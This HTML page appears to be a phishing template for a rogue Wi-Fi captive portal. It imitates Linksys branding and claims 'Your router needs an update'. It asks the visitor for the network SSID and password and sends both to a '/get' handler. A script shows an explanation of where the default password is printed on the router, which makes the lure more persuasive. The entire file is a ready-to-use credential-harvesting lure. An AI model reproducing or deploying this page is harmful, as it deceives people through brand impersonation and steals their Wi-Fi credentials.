<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<style>
body {
  font-family: Arial, sans-serif;
  background-color: black;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #000000;
  margin-right: 80px
}

.form-container {
  background: darkgrey;
  border: 1px solid #000000;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: black;
  margin-bottom: 20px;
}
h2 {
  text-align: center; 
  font-size: 24px;
  font-weight: 500;
  color: #086CE3;
  margin-bottom: 20px;
}


.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #086CE3;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}
.brand-name {
  font-size: 80px;
  color: white;
  margin-left: 10px;
}

.submit-btn {
  background: #086CE3;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #000000;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: #000000;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">


    <div class="brand-name"><b>Linksys</b></div>

  </div>

  <div class="form-container">
  <center><h1><b>Your router needs an update</b></h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="SSID" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
	    <a href="javascript:void(0);" class="forgot-password">Where can I find my SSID?</a>
			<div class="error-message"></div>
      <button class="submit-btn" type="submit">UPDATE</button>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "The SSID, or Service Set Identifier, represents your WiFi network's official name. If you haven't previously set a custom name, the default SSID (and password) can be located on the back panel of your Linksys router.";
    errorMessage.style.display = 'block';
  });
</script>
</meta>
</body>
</html>
